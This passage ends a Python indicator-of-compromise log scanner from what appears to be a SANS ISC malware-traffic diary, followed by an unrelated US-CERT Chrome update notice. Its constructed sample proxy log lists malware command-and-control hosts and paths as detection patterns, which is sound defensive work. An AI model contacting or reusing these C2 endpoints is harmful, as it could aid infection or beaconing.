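    """Return the first indicator a log line matches on host (or IP), method and path."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    for ioc in indicators:
        # Host or destination IP must match; method and path narrow it further so a
        # shared-hosting IP alone does not fire.
        if m.group("host") != ioc["host"] and m.group("dst") != ioc["ip"]:
            continue
        if m.group("method") != ioc["method"]:
            continue
        path = m.group("path")
        hit = path.startswith(str(ioc["path"])) if ioc["prefix_only"] else path == ioc["path"]
        if hit:
            return ioc
    return None


def scan_logs(lines: List[str], indicators: List[Dict[str, object]]) -> List[tuple]:
    """Return (timestamp, client, indicator host, indicator path) for every hit."""
    hits = []
    for line in lines:
        ioc = match_log_line(line, indicators)
        if ioc is not None:
            ts, client = line.split()[:2]
            hits.append((ts, client, ioc["host"], ioc["path"]))
    return hits


def is_known_bad(data: bytes) -> bool:
    """True if the SHA256 of the given file contents is one of the diary's samples."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256


# Constructed proxy log; 192.0.2.0/24 addresses are documentation addresses, not real hosts.
SAMPLE_PROXY_LOG = [
    "2018-12-05T14:02:11Z 10.0.0.25 191.101.20.16:80 POST ninglarenlac.com /4/forum.php 200",
    "2018-12-05T14:02:12Z 10.0.0.25 192.0.2.10:80 GET api.ipify.org / 200",
    "2018-12-05T14:02:40Z 10.0.0.25 47.52.45.178:80 GET api2.doter.at /webstore/AbCdEf123 200",
    "2018-12-05T14:03:05Z 10.0.0.31 192.0.2.20:443 GET example.com / 200",
    "2018-12-05T14:05:50Z 10.0.0.25 46.163.119.217:80 GET amalu.at /wp-admin/includes/36s 200",
]

if __name__ == "__main__":
    iocs = parse_indicators(DEFANGED_INDICATORS)
    for ts, client, host, path in scan_logs(SAMPLE_PROXY_LOG, iocs):
        print(f"{ts} {client} -> {host}{path}")
```

The ipify check and Tor directory fetches are deliberately not in the indicator set, in line with the diary's own note that the IP check is not inherently malicious; flagging them would only add noise. Port is parsed but not compared, since the same C2 paths would be just as suspicious on another port.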

Final words

3 email examples, a pcap of the infection traffic, and malware/artifacts associated with today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Google Releases Security Updates for Chrome


Original release date: December 04, 2018

Google has released Chrome version 71.0.3578.80 for Windows, Mac, and Linux. This version addresses multiple vulnerabilities that an attacker could exploit to take control of an affected system.

NCCIC encourages users and administrators to review the Chrome Releases page and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.